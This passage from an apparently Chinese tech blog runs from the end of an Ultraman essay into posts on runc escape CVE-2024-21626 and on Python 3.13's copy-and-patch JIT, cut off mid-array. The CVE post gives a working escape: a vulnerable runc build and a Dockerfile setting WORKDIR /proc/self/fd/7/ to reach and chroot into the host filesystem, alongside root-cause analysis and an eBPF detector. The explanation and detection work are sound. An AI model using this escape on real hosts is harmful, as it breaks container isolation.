外婆：美奈子も大きくなったらマットの人のお嫁さんになるのかね/美奈子长大后会嫁给 MAT 队的人吗？
美奈子：なの嫌いよ/我才不要
伊吹: マットは私1人たくさんというわけだな/是觉得家里有一个 MAT 队员就够了把
美奈子：違うの，マットの人のお嫁さんにならないってことは，マットの隊員になるということを妨げはしないわ/不是的，不想嫁给 MAT 队员是为了不妨碍我成为 MAT 队员
美奈子妈妈：女の子のくせに/女孩子家家的
美奈子：だって丘隊員だって女/可是丘队员也是女的
伊吹：まつお前は平凡な男と結婚してくれ,そのほうがお父さんは安心だ/算了，你还是找个普通的男生结婚吧，这样我才会更放心一些
美奈子：嫌よ私はウーマンサプ派な/不要，我可是女权主义者

这一段对话，即便从今天的眼光来看，也是非常的超前的。

总结一下

其实奥特曼剧作里，非常精巧的片段还很多，有些是脚本/监督来表达自己心中的想法，有些是受时代环境的影响（另外一个很典型的例子是雷欧当年受到《日本沉没》系列很深刻的影响）。限于篇幅，这里不再展开了。如果有兴趣的话，感觉我可以开个系列单篇来做单元回的解析

拍摄手法

实际上奥特曼系列作为特摄剧，一直在孜孜不倦的追求视觉效果的形式。从初代奥特曼首次空战巴尔坦星人开始，到手绘出的艾斯的梅塔利姆光线。监督一直在尝试给观众全新的视觉体验。不过说实话，我觉得目前的奥有点漫威的感觉，过多的特效，失去了原本那种精心制作的感觉。

抛开个人碎碎念以外，我自己觉得奥特摄影的巅峰应该是在迪迦，可能熟悉的人已经猜出来我想说什么了，16话よみがえる鬼神/苏醒的鬼神，37话花。将日式美学和能剧元素发挥到了极致，一种特殊的美轮美奂

这个时候必须上图了

说实话，我觉得这种特殊的美感，简直让我一身鸡皮疙瘩

宗教气质

其实奥特曼的宗教气质一直非常的浓厚。其实千言万语归为一个问题

奥特曼是人还是神？

在早期的两部作品中，初代和赛文，毫无疑问的是神性非常重的化身。从更高的维度去观察人类，注视人类。初代结局佐菲问初代的“ウルトラマン、そんなに地球人が好きになったのか”，不由的让人有一种神爱世人的联想。而赛文奥特曼所设定的，深爱着人类，帮人类所承担了人类的罪恶，这种设定也是非常的神性

我们若认自己的罪，神是信实的，是公义的，必要赦免我们的罪，洗净我们一切的不义。 — 《新约》约翰一书1:9

而从归曼开始，人性的部分开始融入到奥特曼的内核中，奥特曼会因为人间体至爱被外星人杀害而陷入极端愤怒，而人间体也会因为目睹人类的黑暗而质疑战斗的意义

到了迪迦，可能居间惠队长的一段话，为这个长达20余年的争论画下了一个暂时的休止符

最初にウルトラマンをこの目で見たとき私は神に出会えたと思った。人類を正しい方向に導いてくれる存在だと。でも違うのよね。それがだんだん分かってきたの。ウルトラマンは光であり人なのね。/我最初见到奥特曼时，以为遇到了神，以为他是将人类指引往正确道路的存在。但是我错了，后来我才渐渐明白，奥特曼既是光，也是人。

总结

奥特曼走到如今，已经过去了半个世纪。在这半个世纪中，不同的脚本和监督一起给无数的人绘制了一个梦幻的世界。这也是我想用 “ヒーロが必要なんだよ，金城君。ヒーローが必要なんだ！” 来做为本文开头的原因

而怎么结束这篇文章呢

毫无疑问的还是那句话

ウルトラマン大好きだ

简单聊聊 CVE-2024-21626

2024-02-10T20:00:00.000Z

本来这篇文章应该在初一凌晨发的，但是拖延癌晚期，所以到现在才发，得反思下了

背景

众所周知，容器逃逸并不是什么令人稀奇的问题了（不被逃逸的容器才是稀奇），2月初，runc 社区正式公布了一个船新的逃逸 CVE，参见 https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv，版本横跨 1.0 到 1.1.11

这个 CVE 的核心特性在于“可以通过镜像分发的方式，成本很低的进行逃逸”

我们先来复现一下这个问题

我自己的环境是这样

看这篇博客的同学可以参考下面方式进行环境准备，

按照自己的发行版确保安装了，Docker, libseccomp, golang
按照下面方式进行环境安装

git clone https://github.com/opencontainers/runc

git checkout v1.1.0-rc.1

make

sudo rm -rf $(which runc)

sudo make install

sudo systemctl restart docker

然后我们可以准备这样一个 Dockerfile

FROM ubuntu
 
# Sets the current working directory for this image
WORKDIR /proc/self/fd/7/

执行 docker build . -t test

然后我们可以执行 docker run --rm -ti test bash，需要多次才能执行成功，执行成功后我们进入容器 shell

然后我们通过 cd ../.. 退出到根目录，接着我们就能看到，我们宿主机完整的文件了。同时我们还能使用 chroot 能命令，切换到宿主机的根目录。

那么这样一个问题是怎么导致的呢？

原理

聊这个 CVE 之前，需要聊一些背景知识。首先是 Linux 下 openat2 这个 syscall。openat2 是 openat 在 Linux 5.6 之后的一个对于原本 open/openat 的一个扩展。其核心在于可以让用户进行更细粒度的控制，包括安全控制。比如 O_CLOEXEC （在执行 exec 时，自动更关闭之前的文件描述符）等细粒度的 flag 控制。

然后我们需要来聊聊整个容器的启动过程

容器启动的过程概述可以抽象为这样，

docker-client -> dockerd -> containerd -> containerd-shim -> runc（容器外） -> runc（容器内） -> containter-entrypoint

在启动过程中，runc 会负责设置容器的 cgroup 信息

func (p *initProcess) start() (retErr error) {
    // ...
if err := p.manager.Apply(p.pid()); err != nil {
return fmt.Errorf("unable to apply cgroup configuration: %w", err)
}
    // ...
}

众所周知，cgroup 最常见的控制方法是直接写入 cgroup 文件，runc 也不例外，同时为了保证文件的安全性，runc 会尝试使用 openat2 来进行文件打开。但是如前面所说的一样，openat2 是个在 Linux 5.6 之后才引入的 syscall，那么咋整捏，runc 有一个特殊方法 prepareOpenat2

func prepareOpenat2() error {
prepOnce.Do(func() {
fd, err := unix.Openat2(-1, cgroupfsDir, &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH,
})
if err != nil {
prepErr = &os.PathError{Op: "openat2", Path: cgroupfsDir, Err: err}
if err != unix.ENOSYS { //nolint:errorlint // unix errors are bare
logrus.Warnf("falling back to securejoin: %s", prepErr)
} else {
logrus.Debug("openat2 not available, falling back to securejoin")
}
return
}
var st unix.Statfs_t
if err = unix.Fstatfs(fd, &st); err != nil {
prepErr = &os.PathError{Op: "statfs", Path: cgroupfsDir, Err: err}
logrus.Warnf("falling back to securejoin: %s", prepErr)
return
}

cgroupFd = fd

resolveFlags = unix.RESOLVE_BENEATH | unix.RESOLVE_NO_MAGICLINKS
if st.Type == unix.CGROUP2_SUPER_MAGIC {
// cgroupv2 has a single mountpoint and no "cpu,cpuacct" symlinks
resolveFlags |= unix.RESOLVE_NO_XDEV | unix.RESOLVE_NO_SYMLINKS
}
})

return prepErr
}

眼尖的同学已经看到了，在测试是否有 openat2 的时候，runc 会使用 unix.Openat2(-1, cgroupfsDir, &unix.OpenHow{Flags: unix.O_DIRECTORY | unix.O_PATH}) 这个调用来测试是否有 openat2，在这里，我们没有使用 O_CLOEXEC，同时我已经打开的文件并没有被关闭，这就导致了一个问题，如果系统支持 openat2，这里就会存在一个文件描述符泄漏（简单的给一个结论这里泄漏的文件描述符指向 /sys/fs/cgroup）

而利用方式也很简单，我们上面的样例 Dockerfile 中的 WORKDIR /proc/self/fd/7/ 就是利用这个泄漏的文件描述符，WORKDIR 在 OCI 中会转化成 CWD 的设置，在 runc 启动过程中，将直接通过 chdir 的方式进行设置

// before executing the command inside the namespace
func finalizeNamespace(config *initConfig) error {
// Ensure that all unwanted fds we may have accidentally
// inherited are marked close-on-exec so they stay out of the
// container
if err := utils.CloseExecFrom(config.PassedFilesCount + 3); err != nil {
return fmt.Errorf("error closing exec fds: %w", err)
}

// we only do chdir if it's specified
doChdir := config.Cwd != ""
if doChdir {
// First, attempt the chdir before setting up the user.
// This could allow us to access a directory that the user running runc can access
// but the container user cannot.
err := unix.Chdir(config.Cwd)
switch {
case err == nil:
doChdir = false
case os.IsPermission(err):
// If we hit an EPERM, we should attempt again after setting up user.
// This will allow us to successfully chdir if the container user has access
// to the directory, but the user running runc does not.
// This is useful in cases where the cwd is also a volume that's been chowned to the container user.
default:
return fmt.Errorf("chdir to cwd (%q) set in config.json failed: %w", config.Cwd, err)
}
}

那么换句话说，我们容器内启动的进程默认的 /proc/pid/cwd 就是我们设置的 /proc/self/fd/7 也就是我们宿主机的 /sys/fs/cgroup，这就导致了我们在容器内可以直接访问宿主机的文件

这整个流程只能说，，阴差阳错

探测

如果我们 runc 版本没有办法及时更新到修复后的版本，那么我们有没有办法探测到这个问题呢？可以

这个攻击的特征非常简单

使用 chdir 系统调用
目标路径是 /proc/self/fd/*

那么我们用 eBPF+Tracepoint 处理下就 OK

#include "vmlinux.h"
#include "bpf_tracing.h"
#include "bpf_helpers.h"

char __license[] SEC("license") = "Dual MIT/GPL";

struct event {
    __u32 pid;
    __u8 path[256];
};

const struct event *unusedevent __attribute__((unused));

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
__uint(max_entries, 1 << 24);
} events SEC(".maps");

struct sys_enter_chdir_args {
    unsigned short common_type;
    unsigned char common_flags;
    unsigned char common_preempt_count;
    int common_pid;
    int __syscall_nr;
    const char *filename;
};

SEC("tracepoint/syscalls/sys_enter_chdir")
int trace_enter_chdir(struct sys_enter_chdir_args *ctx) {
    if (!ctx){
        return 0;
    }
    struct event *event;
    event = bpf_ringbuf_reserve(&events, sizeof(struct event), 0);
    if (!event) {
        return 0;
    }
    event->pid = bpf_get_current_pid_tgid()>>32;
    const char *path = (const char *)ctx->filename;
    bpf_probe_read_str(event->path, sizeof(event->path), path);
    bpf_ringbuf_submit(event, 0);
    return 0;
}

将事件上报到用户态，然后用户态用正则处理下 path 就行。当然这里的特征还能更多样化一些

unwind 一下拿到用户态调用栈，确定是 runc 的调用
确定下是否是容器进程等

由于我比较懒，所以在博客里就不写了，有兴趣的同学可以自己写写（XD

总结

也没啥好总结的，容器逃逸不是新闻，不逃逸才是（XD

简单聊聊 Python 3.13 的 JIT 方案

2024-01-03T18:30:00.000Z

Python 3.13 的 JIT 方案最终确定了，我觉得可以说又新又好。所以深夜水一篇水文，来聊聊这个 JIT 方案

这篇文章可能会有些枯燥，所以如果对此不感兴趣的同学可以直接 x 掉

基础知识

在聊 Python 3.13 具体的实现之前，我们需要来了解下它所采用的 JIT 方案的基础知识

JIT 本身的定义我相信阅读这篇文章的同学已经非常了解了，所以此处不再赘述。JIT 核心分为两大块

代码的 profile，以确定热点路径，尽可能的减少 JIT 的 fallback
汇编代码的生成

本文主要会聊代码的生成部分

在此之前，Python 生态里一个 JIT 的实现，Pyston/Pypy，他们所采取的方案其实是和 LuaJIT 的方式类似，开发者手写汇编来完成代码的特化，然后依赖 DynASM 执行相关的代码

这种方式主要的缺陷在于

手写汇编带来的心智负担
对于平台的兼容性

为了给大家一个直观的感受，我给出一个我之前写过的汇编的例子来作为演示

首先，我需要实现的功能很简单，用 C 来描述应该是这样的

int main(int argc, char *argv[], char * envp[]) {
    if (argv > 0) {
        return execve(args[0], args, envp);
    }
    return 0;
}

因为一些尺寸极端敏感的场景，这份 C 代码没有办法直接 link libc，为了尽可能的压缩 binary size，我选择用汇编实现，以下是 X86_64 的 ASM

.global _start

.section .text
_start:
    # Setup stack frame
    movq %rsp, %rbp

    # Load argc
    movq (%rbp), %r8       # %r8 now holds argc

    # Load argv
    leaq 8(%rbp), %r9      # %r9 now points to argv[0]

    # Find envp by iterating through argv until NULL is found
    movq %r9, %r10         # %r10 will be used to find envp
find_envp:
    movq (%r10), %rdi      # Load the current pointer in argv
    cmpq $0, %rdi          # Compare it to NULL
    je envp_found          # If NULL, we've found the end of argv
    addq $8, %r10          # Otherwise, move to the next pointer in argv
    jmp find_envp

envp_found:
    addq $8, %r10          # Move one more step to point to the start of envp

    # Allocate space on the stack for the new argv array
    subq $8, %rsp          # Space for NULL termination
    subq %r8, %rsp
    subq %r8, %rsp         # Space for argc pointers (including argv[0])
    movq %rsp, %r11        # %r11 now points to the start of the new argv array

    # Copy argv pointers to the new array
    movq $0, %rcx          # Counter
copy_loop:
    cmpq %rcx, %r8
    je copy_done
    movq (%r9, %rcx, 8), %rdi
    movq %rdi, (%r11, %rcx, 8)
    incq %rcx
    jmp copy_loop

copy_done:
    movq $0, (%r11, %rcx, 8)   # NULL-terminate the new argv array

    # Check if argc > 0
    cmpq $0, %r8
    jle .Lexit

    # Execute execve syscall
    movq $59, %rax          # syscall number for execve
    movq (%r11), %rdi        # filename is argv[0]
    movq %r11, %rsi         # New argv array
    movq %r10, %rdx         # envp
    syscall

.Lexit:
    # Exit the program using the exit syscall
    movq $60, %rax
    xorq %rdi, %rdi
    syscall

同时，因为这个功能需要跨平台实现，所以我们需要同时实现 ARM64 的版本，以下是 ARM64 的 ASM

.global _start

.section .text
_start:
    # Setup stack frame
    mov x29, sp

    # Load argc
    ldr x8, [x29]        # x8 now holds argc

    # Load argv
    add x9, x29, #8      # x9 now points to argv[0]

    # Find envp by iterating through argv until NULL is found
    mov x10, x9          # x10 will be used to find envp
find_envp:
    ldr x19, [x10]       # Load the current pointer in argv
    cbz x19, envp_found  # If NULL, we've found the end of argv
    add x10, x10, #8     # Otherwise, move to the next pointer in argv
    b find_envp

envp_found:
    add x10, x10, #8     # Move one more step to point to the start of envp

    # Allocate space on the stack for the new argv array
    sub sp, sp, #8       # Space for NULL termination
    sub sp, sp, x8, lsl #3
    sub sp, sp, x8, lsl #3      # Space for argc pointers (including argv[0])
    mov x11, sp          # x11 now points to the start of the new argv array

    # Copy argv pointers to the new array
    mov x12, #0          # Counter
copy_loop:
    cmp x12, x8
    b.eq copy_done
    ldr x19, [x9, x12, lsl #3]
    str x19, [x11, x12, lsl #3]
    add x12, x12, #1
    b copy_loop

copy_done:
    mov x19, #0
    str x19, [x11, x12, lsl #3]   # NULL-terminate the new argv array

    # Check if argc > 0
    cmp x8, #0
    b.le .Lexit

    # Execute execve syscall
    mov x8, #221         # syscall number for execve
    ldr x0, [x11]        # filename is argv[0]
    mov x1, x11          # New argv array
    mov x2, x10          # envp
    svc #0

.Lexit:
    # Exit the program using the exit syscall
    mov x8, #93
    mov x0, #0
    svc #0

你能发现，X86_64 的寄存器和 ARM 生态完全不一样，这就导致了我们需要为不同的平台写不同的汇编代码，你再考虑下我们需要

MIPS
RISC-V
PowerPC
…

即便 DynASM 已经对跨平台做了一些抽象，但是直接手写汇编所带来的心智负担还是非常大的

所以，我们需要更现代化的方案，这就是今天要聊到 Copy And Patch。其核心在于利用已有编译器生成的汇编代码，然后对其进行 patch，来完成代码的特化

我们一点点来了解这个方案，首先我们从最基础的一个代码入手

假设我们现在有一个最基础的 C 代码

1
2
3

int add(int a, int b) {
    return a + b;
}

这个代码没有任何问题，我们可以直接用 gcc 来编译它，然后反汇编，看看它的汇编代码是什么样的

0000000000000000 :
       0: 55                            pushq   %rbp
       1: 48 89 e5                      movq    %rsp, %rbp
       4: 89 7d fc                      movl    %edi, -0x4(%rbp)
       7: 89 75 f8                      movl    %esi, -0x8(%rbp)
       a: 8b 55 fc                      movl    -0x4(%rbp), %edx
       d: 8b 45 f8                      movl    -0x8(%rbp), %eax
      10: 01 d0                         addl    %edx, %eax
      12: 5d                            popq    %rbp
      13: c3                            retq

最基础的汇编代码，没有问题。

那么我们现在有这样一个场景，我们提供两个函数

load_left
load_right

这个两个函数将用于加载我们左右两个操作数，然后我们的代码变成下面这样

int load_left();
int load_right();
int add() {
    return load_left() + load_right();
}

我们开垦一下汇编

0000000000000000 :
       0: 55                            pushq   %rbp
       1: 48 89 e5                      movq    %rsp, %rbp
       4: 53                            pushq   %rbx
       5: 48 83 ec 08                   subq    $0x8, %rsp
       9: b8 00 00 00 00                movl    $0x0, %eax
       e: e8 00 00 00 00                callq   0x13 
                000000000000000f:  R_X86_64_PLT32       load_left-0x4
      13: 89 c3                         movl    %eax, %ebx
      15: b8 00 00 00 00                movl    $0x0, %eax
      1a: e8 00 00 00 00                callq   0x1f 
                000000000000001b:  R_X86_64_PLT32       load_right-0x4
      1f: 01 d8                         addl    %ebx, %eax
      21: 48 8b 5d f8                   movq    -0x8(%rbp), %rbx
      25: c9                            leave
      26: c3                            retq

我们关注到，汇编中有这样两行奇怪的东西

 e: e8 00 00 00 00                callq   0x13 
          000000000000000f:  R_X86_64_PLT32       load_left-0x4
1a: e8 00 00 00 00                callq   0x1f 
          000000000000001b:  R_X86_64_PLT32       load_right-0x4

Bingo，熟悉一些基础的程序知识同学应该反应过来了，e8 指令（即 x86 下的 callq 指令）后面的 00 00 00 00 地址，将会在执行时，被 reloc 成为 load_left 和 load_right 的地址。

那么可能有些同学已经反应过来了，如果我们有办法将这段汇编代码中的 e8 00 00 00 00 替换成 e8 xx xx xx xx，那么我们就可以在这里 patch 上我们的代码了。这里是不是可以作为我们 JIT 的入口了呢？

当然，这里有一个问题，e8 后面的指令地址应该怎么样确定呢？

这里我们可以注意到，程序中有这样的部分 000000000000000f: R_X86_64_PLT32 load_left-0x4，这个是一个 ELF 的 Relocation Entry，它的作用是告诉我们，e8 后面的地址，应该是 load_left 的地址，同时，我们也能知道重定向部分的起始 0x0f.

同样的类型还有很多，比如 R_X86_64_PC32，R_X86_64_GOTPCREL 等等，这些类型的 Relocation Entry 都可以帮助我们定位到我们需要 patch 的地址，以及帮助我们计算偏移

再举个例子

// 17f: 48 bf 00 00 00 00 00 00 00 00 movabsq $0x0, %rdi
// 0000000000000181:  R_X86_64_64  .rodata.str1.1
// 189: 48 be 00 00 00 00 00 00 00 00 movabsq $0x0, %rsi
// 000000000000018b:  R_X86_64_64  .rodata.str1.1+0x16

这里我们可以看到，48 bf 00 00 00 00 00 00 00 00 和 48 be 00 00 00 00 00 00 00 00 后面都有一个 R_X86_64_64 的 Relocation Entry，这个 Relocation Entry 告诉我们，这两个指令后面的地址，应该是 .rodata.str1.1 的地址，同时，我们也能知道重定向部分的起始 0x181 和 0x18b，这样我们就可以计算出偏移，然后 patch 上我们的代码了

那么这就是整个 copy and patch 的大概过程，我们可以利用编译器生成的汇编代码，然后通过 Relocation Entry 来定位我们需要 patch 的地址，然后 patch 上我们的代码。最终尽可能的简化我们的心智负担

Python 3.13 的 JIT

Python 3.13 目前的 JIT 方案已经确定下来了，它的核心就是 Copy And Patch，现在我们整体来看一下

首先，Python 有一个 Python/executor_cases.h 文件，囊括了我们所有的字节码和对应的操作

比如

case _BINARY_OP_ADD_INT: {
    PyObject *right;
    PyObject *left;
    PyObject *res;
    right = stack_pointer[-1];
    left = stack_pointer[-2];
    STAT_INC(BINARY_OP, hit);
    res = _PyLong_Add((PyLongObject *)left, (PyLongObject *)right);
    _Py_DECREF_SPECIALIZED(right, (destructor)PyObject_Free);
    _Py_DECREF_SPECIALIZED(left, (destructor)PyObject_Free);
    if (res == NULL) goto pop_2_error_tier_two;
    stack_pointer[-2] = res;
    stack_pointer += -1;
    break;
}

然后我们新增加了一个 tools/template.c 文件，

#include "Python.h"

#include "pycore_call.h"
#include "pycore_ceval.h"
#include "pycore_dict.h"
#include "pycore_emscripten_signal.h"
#include "pycore_intrinsics.h"
#include "pycore_jit.h"
#include "pycore_long.h"
#include "pycore_opcode_metadata.h"
#include "pycore_opcode_utils.h"
#include "pycore_range.h"
#include "pycore_setobject.h"
#include "pycore_sliceobject.h"

#include "ceval_macros.h"

#undef CURRENT_OPARG
#define CURRENT_OPARG() (_oparg)

#undef CURRENT_OPERAND
#define CURRENT_OPERAND() (_operand)

#undef DEOPT_IF
#define DEOPT_IF(COND, INSTNAME) \
    do {                         \
        if ((COND)) {            \
            goto deoptimize;     \
        }                        \
    } while (0)

#undef ENABLE_SPECIALIZATION
#define ENABLE_SPECIALIZATION (0)

#undef GOTO_ERROR
#define GOTO_ERROR(LABEL)        \
    do {                         \
        goto LABEL ## _tier_two; \
    } while (0)

#undef LOAD_IP
#define LOAD_IP(UNUSED) \
    do {                \
    } while (0)

#define PATCH_VALUE(TYPE, NAME, ALIAS)  \
    extern void ALIAS;                  \
    TYPE NAME = (TYPE)(uint64_t)&ALIAS;

#define PATCH_JUMP(ALIAS)                                    \
    extern void ALIAS;                                       \
    __attribute__((musttail))                                \
    return ((jit_func)&ALIAS)(frame, stack_pointer, tstate);

_Py_CODEUNIT *
_JIT_ENTRY(_PyInterpreterFrame *frame, PyObject **stack_pointer, PyThreadState *tstate)
{
    // Locals that the instruction implementations expect to exist:
    PATCH_VALUE(_PyUOpExecutorObject *, current_executor, _JIT_EXECUTOR)
    int oparg;
    int opcode = _JIT_OPCODE;
    _PyUOpInstruction *next_uop;
    // Other stuff we need handy:
    PATCH_VALUE(uint16_t, _oparg, _JIT_OPARG)
    PATCH_VALUE(uint64_t, _operand, _JIT_OPERAND)
    PATCH_VALUE(uint32_t, _target, _JIT_TARGET)
    // The actual instruction definitions (only one will be used):
    if (opcode == _JUMP_TO_TOP) {
        CHECK_EVAL_BREAKER();
        PATCH_JUMP(_JIT_TOP);
    }
    switch (opcode) {
#include "executor_cases.c.h"
        default:
            Py_UNREACHABLE();
    }
    PATCH_JUMP(_JIT_CONTINUE);
    // Labels that the instruction implementations expect to exist:
unbound_local_error_tier_two:
    _PyEval_FormatExcCheckArg(
        tstate, PyExc_UnboundLocalError, UNBOUNDLOCAL_ERROR_MSG,
        PyTuple_GetItem(_PyFrame_GetCode(frame)->co_localsplusnames, oparg));
    goto error_tier_two;
pop_4_error_tier_two:
    STACK_SHRINK(1);
pop_3_error_tier_two:
    STACK_SHRINK(1);
pop_2_error_tier_two:
    STACK_SHRINK(1);
pop_1_error_tier_two:
    STACK_SHRINK(1);
error_tier_two:
    _PyFrame_SetStackPointer(frame, stack_pointer);
    return NULL;
deoptimize:
    _PyFrame_SetStackPointer(frame, stack_pointer);
    return _PyCode_CODE(_PyFrame_GetCode(frame)) + _target;
}

其中，_JIT_OPCODE，由编译时传入，作为当前的 opcode，因为这是一个固定值，所以编译器在编译的时候，会 strip 掉其余的分支，只保留当前 opcode 的分支，某种意义上，核心的 switch 部分就编程这样了（以 _BINARY_OP_ADD_INT 为例）

switch(_BINARY_OP_ADD_INT) {
    case _BINARY_OP_ADD_INT: {
        PyObject *right;
        PyObject *left;
        PyObject *res;
        right = stack_pointer[-1];
        left = stack_pointer[-2];
        STAT_INC(BINARY_OP, hit);
        res = _PyLong_Add((PyLongObject *)left, (PyLongObject *)right);
        _Py_DECREF_SPECIALIZED(right, (destructor)PyObject_Free);
        _Py_DECREF_SPECIALIZED(left, (destructor)PyObject_Free);
        if (res == NULL) goto pop_2_error_tier_two;
        stack_pointer[-2] = res;
        stack_pointer += -1;
        break;
    }
    default:
        Py_UNREACHABLE();
}

我们最终能得到这样的汇编

// 0: 55                            pushq   %rbp
// 1: 41 57                         pushq   %r15
// 3: 41 56                         pushq   %r14
// 5: 41 55                         pushq   %r13
// 7: 41 54                         pushq   %r12
// 9: 53                            pushq   %rbx
// a: 48 83 ec 18                   subq    $0x18, %rsp
// e: 48 89 54 24 10                movq    %rdx, 0x10(%rsp)
// 13: 49 89 f7                      movq    %rsi, %r15
// 16: 48 89 7c 24 08                movq    %rdi, 0x8(%rsp)
// 1b: 4c 8b 66 f0                   movq    -0x10(%rsi), %r12
// 1f: 48 8b 6e f8                   movq    -0x8(%rsi), %rbp
// 23: 49 be 00 00 00 00 00 00 00 00 movabsq $0x0, %r14
// 0000000000000025:  R_X86_64_64  _Py_stats
// 2d: 49 8b 06                      movq    (%r14), %rax
// 30: 48 85 c0                      testq   %rax, %rax
// 33: 74 07                         je      0x3c <_JIT_ENTRY+0x3c>
// 35: 48 ff 80 88 a4 01 00          incq    0x1a488(%rax)
// 3c: 48 b8 00 00 00 00 00 00 00 00 movabsq $0x0, %rax
// 000000000000003e:  R_X86_64_64  _PyLong_Add
// 46: 4c 89 e7                      movq    %r12, %rdi
// 49: 48 89 ee                      movq    %rbp, %rsi
// 4c: ff d0                         callq   *%rax
// 4e: 49 89 c5                      movq    %rax, %r13
// 51: f6 45 03 80                   testb   $-0x80, 0x3(%rbp)
// 55: 48 b9 00 00 00 00 00 00 00 00 movabsq $0x0, %rcx
// 0000000000000057:  R_X86_64_64  PyInterpreterState_Get
// 5f: 75 24                         jne     0x85 <_JIT_ENTRY+0x85>
// 61: 49 8b 06                      movq    (%r14), %rax
// 64: 48 85 c0                      testq   %rax, %rax
// 67: 74 07                         je      0x70 <_JIT_ENTRY+0x70>
// 69: 48 ff 80 78 58 09 00          incq    0x95878(%rax)
// 70: 48 89 cb                      movq    %rcx, %rbx
// 73: ff d1                         callq   *%rcx
// 75: 48 89 d9                      movq    %rbx, %rcx
// 78: 48 ff 88 c8 15 04 00          decq    0x415c8(%rax)
// 7f: 48 ff 4d 00                   decq    (%rbp)
// 83: 74 37                         je      0xbc <_JIT_ENTRY+0xbc>
// 85: 41 f6 44 24 03 80             testb   $-0x80, 0x3(%r12)
// 8b: 75 49                         jne     0xd6 <_JIT_ENTRY+0xd6>
// 8d: 49 8b 06                      movq    (%r14), %rax
// 90: 48 85 c0                      testq   %rax, %rax
// 93: 74 07                         je      0x9c <_JIT_ENTRY+0x9c>
// 95: 48 ff 80 78 58 09 00          incq    0x95878(%rax)
// 9c: ff d1                         callq   *%rcx
// 9e: 48 ff 88 c8 15 04 00          decq    0x415c8(%rax)
// a5: 49 ff 0c 24                   decq    (%r12)
// a9: 75 2b                         jne     0xd6 <_JIT_ENTRY+0xd6>
// ab: 48 b8 00 00 00 00 00 00 00 00 movabsq $0x0, %rax
// 00000000000000ad:  R_X86_64_64  PyObject_Free
// b5: 4c 89 e7                      movq    %r12, %rdi
// b8: ff d0                         callq   *%rax
// ba: eb 1a                         jmp     0xd6 <_JIT_ENTRY+0xd6>
// bc: 48 b8 00 00 00 00 00 00 00 00 movabsq $0x0, %rax
// 00000000000000be:  R_X86_64_64  PyObject_Free
// c6: 48 89 ef                      movq    %rbp, %rdi
// c9: ff d0                         callq   *%rax
// cb: 48 89 d9                      movq    %rbx, %rcx
// ce: 41 f6 44 24 03 80             testb   $-0x80, 0x3(%r12)
// d4: 74 b7                         je      0x8d <_JIT_ENTRY+0x8d>
// d6: 49 8d 47 f0                   leaq    -0x10(%r15), %rax
// da: 4d 85 ed                      testq   %r13, %r13
// dd: 74 2e                         je      0x10d <_JIT_ENTRY+0x10d>
// df: 49 83 c7 f8                   addq    $-0x8, %r15
// e3: 4c 89 28                      movq    %r13, (%rax)
// e6: 48 b8 00 00 00 00 00 00 00 00 movabsq $0x0, %rax
// 00000000000000e8:  R_X86_64_64  _JIT_CONTINUE
// f0: 48 8b 7c 24 08                movq    0x8(%rsp), %rdi
// f5: 4c 89 fe                      movq    %r15, %rsi
// f8: 48 8b 54 24 10                movq    0x10(%rsp), %rdx
// fd: 48 83 c4 18                   addq    $0x18, %rsp
// 101: 5b                            popq    %rbx
// 102: 41 5c                         popq    %r12
// 104: 41 5d                         popq    %r13
// 106: 41 5e                         popq    %r14
// 108: 41 5f                         popq    %r15
// 10a: 5d                            popq    %rbp
// 10b: ff e0                         jmpq    *%rax
// 10d: 48 8b 4c 24 08                movq    0x8(%rsp), %rcx
// 112: 48 29 c8                      subq    %rcx, %rax
// 115: 48 83 c0 b8                   addq    $-0x48, %rax
// 119: 48 c1 e8 03                   shrq    $0x3, %rax
// 11d: 89 41 40                      movl    %eax, 0x40(%rcx)
// 120: 31 c0                         xorl    %eax, %eax
// 122: 48 83 c4 18                   addq    $0x18, %rsp
// 126: 5b                            popq    %rbx
// 127: 41 5c                         popq    %r12
// 129: 41 5d                         popq    %r13
// 12b: 41 5e                         popq    %r14
// 12d: 41 5f                         popq    %r15
// 12f: 5d                            popq    %rbp
// 130: c3                            retq
// 131:

OK，我们在编译器（目前 Python 选用的 LLVM 系列的工具链，编译器为 clang）开了 O3 编译后得到中间文件后，我们利用 llvm-objdump 和 llvm-readobj 来获取到我们需要的信息（这里其实也是一个非常棒的细节，因为我们要跨很多平台，要处理几种不同的二进制格式，比如 Linux 下 ELF，Windows 下 PE，MacOS 下 Mach-O，所以我们需要一个统一的工具来处理这些二进制格式，而 LLVM 的工具链就是这样的工具）我们能注意到，在上面的代码中，有这样一些重定向条目

// 0000000000000025:  R_X86_64_64  _Py_stats
// 000000000000003e:  R_X86_64_64  _PyLong_Add
// 0000000000000057:  R_X86_64_64  PyInterpreterState_Get
// 00000000000000ad:  R_X86_64_64  PyObject_Free
// 00000000000000be:  R_X86_64_64  PyObject_Free
// 00000000000000e8:  R_X86_64_64  _JIT_CONTINUE

然后我们就可以根据从工具链中获取到的信息，来定位到我们需要 patch 的地址，然后生成一些运行时 patch 的 flag，最终生成这样一份 C 代码

static const unsigned char _BINARY_OP_ADD_INT_code_body[306] = {0x55, 0x41, 0x57, 0x41, 0x56, 0x41, 0x55, 0x41, 0x54, 0x53, 0x48, 0x83, 0xec, 0x18, 0x48, 0x89, 0x54, 0x24, 0x10, 0x49, 0x89, 0xf7, 0x48, 0x89, 0x7c, 0x24, 0x08, 0x4c, 0x8b, 0x66, 0xf0, 0x48, 0x8b, 0x6e, 0xf8, 0x49, 0xbe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x06, 0x48, 0x85, 0xc0, 0x74, 0x07, 0x48, 0xff, 0x80, 0x88, 0xa4, 0x01, 0x00, 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x89, 0xe7, 0x48, 0x89, 0xee, 0xff, 0xd0, 0x49, 0x89, 0xc5, 0xf6, 0x45, 0x03, 0x80, 0x48, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x75, 0x24, 0x49, 0x8b, 0x06, 0x48, 0x85, 0xc0, 0x74, 0x07, 0x48, 0xff, 0x80, 0x78, 0x58, 0x09, 0x00, 0x48, 0x89, 0xcb, 0xff, 0xd1, 0x48, 0x89, 0xd9, 0x48, 0xff, 0x88, 0xc8, 0x15, 0x04, 0x00, 0x48, 0xff, 0x4d, 0x00, 0x74, 0x37, 0x41, 0xf6, 0x44, 0x24, 0x03, 